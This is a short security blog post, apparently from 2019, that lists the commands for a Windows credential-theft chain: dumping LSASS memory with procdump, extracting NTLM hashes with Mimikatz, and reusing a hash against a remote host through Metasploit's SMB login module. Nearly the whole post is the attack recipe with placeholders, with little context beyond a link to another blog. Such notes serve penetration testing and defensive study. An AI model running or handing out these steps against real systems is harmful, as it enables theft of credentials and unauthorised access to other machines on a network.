neonprimetime security , just trying to help: Lsass Dump Mimikatz Pass the Hash Basics

Wednesday, October 2, 2019

Lsass Dump Mimikatz Pass the Hash Basics

procdump -ma lsass.exe {path to where you want it dumped}\lsass.dmp

Mimikatz.exe
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonPasswords

Username : {user}
Domain : {domain}
NTLM : {NTLM Hash}

use auxillary/scanner/smb/smb_login
set SMBDomain {domain}
set SMBUser {user}
set RHOSTS {ip addr}
set SMBPass aad3b435b51404eeaad3b435b51404ee:{NTLM Hash}
run

good blog

https://blog.ropnop.com/practical-usage-of-ntlm-hashes/

neonprimetime security , just trying to help

Wednesday, October 2, 2019

Lsass Dump Mimikatz Pass the Hash Basics

No comments:

Post a Comment